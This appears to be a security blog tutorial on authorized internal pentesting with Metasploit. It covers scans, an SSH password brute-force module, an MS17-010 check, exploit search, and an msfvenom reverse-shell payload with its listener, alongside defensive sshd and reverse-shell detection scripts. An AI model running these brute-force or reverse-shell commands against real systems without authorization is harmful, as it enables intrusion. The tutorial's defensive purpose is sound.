Using Metasploit Framework for Internal Security Testing: Responsible Ethical Hacking

Security tutorial - IT technology blog

When Do You Actually Know Your System Has Vulnerabilities?

The honest answer: when an attacker finds them before you do. That’s why sysadmins and security engineers need to proactively “hack” their own systems — before someone else does it for them.

After auditing security on 10+ servers, I’ve found most share the same basic vulnerabilities: services running outdated versions, unnecessary open ports, or unchanged default credentials. These seemingly minor issues are actually the most common entry points in real-world attacks. A solid starting point is following a comprehensive Linux server hardening checklist before running any pentest.

Metasploit Framework is the tool security professionals use to accurately simulate those attacks — in a controlled environment, with explicit authorization. This guide walks through how to use Metasploit responsibly to test your own internal systems.

What Is Metasploit and How Does It Work?

Metasploit Framework is an open-source platform written in Ruby, created in 2003 and now featuring over 2,400 ready-to-use modules. If you’ve ever read a pentest report from any security firm, chances are they used Metasploit at some point in their process.

Key Concepts to Know First

  • Module: The functional unit in Metasploit. There are 4 main types: exploit (attacks a vulnerability), auxiliary (scan/fingerprint), payload (code that runs after a successful exploit), post (actions taken after gaining access).
  • msfconsole: The primary command-line interface for Metasploit.
  • RHOSTS / RPORT: The IP address and port of the target machine.
  • LHOST / LPORT: The IP address and port of your machine (attacker/listener).
  • Session: The connection established after a successful exploit — for example, a shell or Meterpreter.

A rule you cannot skip: Only run Metasploit on systems you own or have explicit written authorization to test. Using it on unauthorized systems is illegal — no exceptions.

Installing Metasploit on Kali Linux / Ubuntu

Kali Linux comes with Metasploit pre-installed. If you’re on Ubuntu or Debian, install it as follows:

# Install Metasploit on Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Initialize the database on first run
msfdb init

# Open the console
msfconsole

The first time you run msfconsole, it will take a few minutes to initialize. Once you see the msf6 > prompt, you’re in.

Hands-On: Testing Your Internal Systems Step by Step

A standard pentest workflow follows 3 phases: Scan → Identify → Test. Here’s each step with concrete examples.

Step 1 — Scan to Discover Hosts and Services

Before using Metasploit, you need to know what’s on your internal network. Use the auxiliary/scanner module:

# Inside msfconsole
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,443,3306,5432,8080,8443
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 20
msf6 auxiliary(scanner/portscan/tcp) > run

Or use Nmap integrated directly into Metasploit for more detailed results:

msf6 > db_nmap -sV -O 192.168.1.0/24
# -sV: detect service version
# -O: detect OS

# View results saved to the database
msf6 > hosts
msf6 > services

Step 2 — Test Whether SSH Is Vulnerable to Brute-Force

SSH with weak passwords is the most common vulnerability I encounter — and also the easiest to fix once discovered. Metasploit has a module to test for this:

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/common-passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf6 auxiliary(scanner/ssh/ssh_login) > run

Did the module find a password? Address it immediately: switch to key-based auth, disable direct root login over SSH, or enable 2FA with Google Authenticator. For an even stronger layer of protection, consider securing SSH with hardware security keys (FIDO2/YubiKey).
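To verify those remediations on a host, here is an added example (not from the original post) that audits an sshd_config file for the settings an ssh_login run relies on: direct root login, password authentication and the per-connection guess limit. It assumes a plain global section (Match blocks are not parsed) and exercises itself on constructed sample configs.

```shell
#!/bin/sh
# Added example: check sshd_config for the settings a brute-force test abuses.
# Only the global section is handled; Match blocks are ignored.

# sshd_option FILE KEY: effective value of KEY, lower-cased. sshd honours the
# first occurrence; commented lines never match because "#" stays attached.
sshd_option() {
    awk -v k="$2" 'tolower($1) == tolower(k) { print tolower($2); exit }' "$1"
}

# audit_sshd FILE: one finding per line, nothing when the file is clean.
audit_sshd() {
    cfg=$1
    v=$(sshd_option "$cfg" PermitRootLogin)
    # sshd defaults to prohibit-password; an explicit "yes" is the weak setting
    [ "$v" = "yes" ] && echo "PermitRootLogin yes: disable direct root login"
    v=$(sshd_option "$cfg" PasswordAuthentication)
    # default is yes, so an absent line is as weak as "yes" once keys are deployed
    { [ -z "$v" ] || [ "$v" = "yes" ]; } && echo "PasswordAuthentication not 'no': passwords still accepted"
    v=$(sshd_option "$cfg" PubkeyAuthentication)
    [ "$v" = "no" ] && echo "PubkeyAuthentication no: key-based login is disabled"
    v=$(sshd_option "$cfg" MaxAuthTries)
    # default is 6; a lower ceiling limits guesses per TCP connection
    { [ -z "$v" ] || [ "$v" -gt 3 ]; } && echo "MaxAuthTries ${v:-6}: lower it (e.g. 3) to slow guessing"
    return 0
}

# Constructed sample configs (not real hosts) to exercise the checker.
WEAK_FILE=$(mktemp)
HARD_FILE=$(mktemp)
printf '%s\n' '# Port 22' 'PermitRootLogin yes' 'PasswordAuthentication yes' > "$WEAK_FILE"
printf '%s\n' 'PermitRootLogin no' 'PasswordAuthentication no' \
    'PubkeyAuthentication yes' 'MaxAuthTries 3' > "$HARD_FILE"

echo "== weak =="; audit_sshd "$WEAK_FILE"          # 3 findings
echo "== hardened =="; audit_sshd "$HARD_FILE"      # no output
```

Run it against the real file with `audit_sshd /etc/ssh/sshd_config` after each change, then re-run the ssh_login module to confirm the finding is gone.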

Step 3 — Test for Vulnerabilities in Specific Services

Suppose a scan reveals a machine running an old version of Samba (SMB). Here’s how to check whether it’s vulnerable to EternalBlue (MS17-010) — the exploit used in the 2017 WannaCry attack:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.55
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

# Output if vulnerable:
# [+] 192.168.1.55:445 - Host is likely VULNERABLE to MS17-010!

Note: The auxiliary/scanner module only checks (detects) — it doesn’t actually exploit. This is the safe way to confirm a vulnerability exists. For automated scanning across a broader attack surface, Nuclei is another powerful tool for vulnerability detection worth adding to your toolkit.

Step 4 — Find the Right Module for a Discovered Vulnerability

Already know which version a service is running? Use search to find the corresponding exploit:

# Search for exploits related to vsftpd 2.3.4 (famous backdoor)
msf6 > search vsftpd

# Search by CVE
msf6 > search cve:2021-44228

# Search for modules related to Apache
msf6 > search name:apache type:exploit

Step 5 — Use msfvenom to Test Endpoint Detection

Another useful exercise is checking whether the antivirus/EDR on your systems can detect a payload. msfvenom lets you generate payloads for testing:

# Generate a Linux reverse shell payload (lab use only)
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o test_payload.elf

# In msfconsole, open a listener to receive the connection
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.10
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run

If the payload runs on your test machine with no alerts triggered, that’s a clear signal to review your entire security monitoring configuration. Tools like osquery for real-time security monitoring can help fill those detection gaps.
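As an added example (not part of the original post) of a host-side check your monitoring could run alongside the msfvenom test: a linux/x64/shell_reverse_tcp payload duplicates its TCP socket onto the shell's stdin and stdout, so a process with sockets on both fd 0 and fd 1 is the pattern to alert on. The function walks a /proc-style tree; the fake tree, the function name and the PROC_ROOT argument are my assumptions, constructed so the check runs offline.

```shell
#!/bin/sh
# Added example: find processes whose stdin and stdout are both sockets, the
# footprint left by a shell_reverse_tcp payload. Needs root on a real /proc to
# read other users' fd links; unreadable entries are skipped.

# socket_stdio_procs [PROC_ROOT]: print "PID ARGV0" per matching process.
socket_stdio_procs() {
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        [ -d "$d/fd" ] || continue
        fd0=$(readlink "$d/fd/0" 2>/dev/null) || continue
        fd1=$(readlink "$d/fd/1" 2>/dev/null) || continue
        case "$fd0" in socket:*) ;; *) continue ;; esac
        case "$fd1" in socket:*) ;; *) continue ;; esac
        # cmdline is NUL-separated; keep argv[0] only
        cmd=$(tr '\000' ' ' < "$d/cmdline" 2>/dev/null | cut -d' ' -f1)
        echo "${d##*/} ${cmd:-?}"
    done
    return 0
}

# Constructed fake /proc tree (dangling symlinks are enough for readlink).
FAKE_PROC=$(mktemp -d)
mk_proc() { # mk_proc PID ARGV0 FD0_TARGET FD1_TARGET
    mkdir -p "$FAKE_PROC/$1/fd"
    printf '%s\000' "$2" > "$FAKE_PROC/$1/cmdline"
    ln -s "$3" "$FAKE_PROC/$1/fd/0"
    ln -s "$4" "$FAKE_PROC/$1/fd/1"
}
mk_proc 4242 /bin/sh       'socket:[55001]' 'socket:[55001]'  # reverse-shell pattern
mk_proc 1001 /usr/sbin/sshd 'socket:[55002]' '/dev/null'      # only stdin is a socket
mk_proc 1002 /bin/bash     '/dev/pts/0'     '/dev/pts/0'      # interactive terminal

socket_stdio_procs "$FAKE_PROC"   # prints: 4242 /bin/sh
```

inetd-style services that legitimately receive their client socket on stdin/stdout will also match, so treat the output as a triage list and allowlist those processes rather than silencing the check.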

Step 6 — Document Your Findings

Metasploit can log entire sessions — handy for writing reports afterward:

# Log console output to a file. msfconsole does not expand shell substitutions
# such as $(date ...), so put the date in the filename yourself:
msf6 > spool /tmp/pentest-report-20240115.log

# Export results from the database
msf6 > hosts -o /tmp/hosts.csv
msf6 > vulns -o /tmp/vulns.csv

# Turn off spool when done
msf6 > spool off

What to Do Before You Start

Here’s a short checklist I always go through before any internal pentest:

  • Get written authorization from management or the system owner — even if it’s a server at your own company.
  • Define the scope clearly: which IPs are in scope, which are off-limits (production systems, primary databases, etc.).
  • Pick a low-impact time window: Heavy network scans can slow down systems. Best to run them off-peak — 11pm to 5am is usually a safe window.
  • Have a rollback plan: Some exploits can crash services — know how to restart them if needed.
  • Don’t store real credentials in your lab: Use separate test passwords for your testing environment.

Conclusion

You don’t need to be a professional pentester to use Metasploit effectively. Mastering 4–5 core auxiliary modules is enough for a sysadmin to run periodic audits and catch the majority of common vulnerabilities.

Following proper process is non-negotiable: get authorization, define scope, document everything, and remediate what you find right away. An internal pentest session typically takes only 3–4 hours. That investment is far smaller than the cost of a real incident — according to the IBM Cost of a Data Breach Report 2023, the average data breach costs $4.45 million USD.

Patch it, reconfigure it, run the scan again to confirm it’s fixed — that’s the complete security hardening loop. To track every change made during remediation, pair this workflow with auditd as your system’s black box for change tracking.
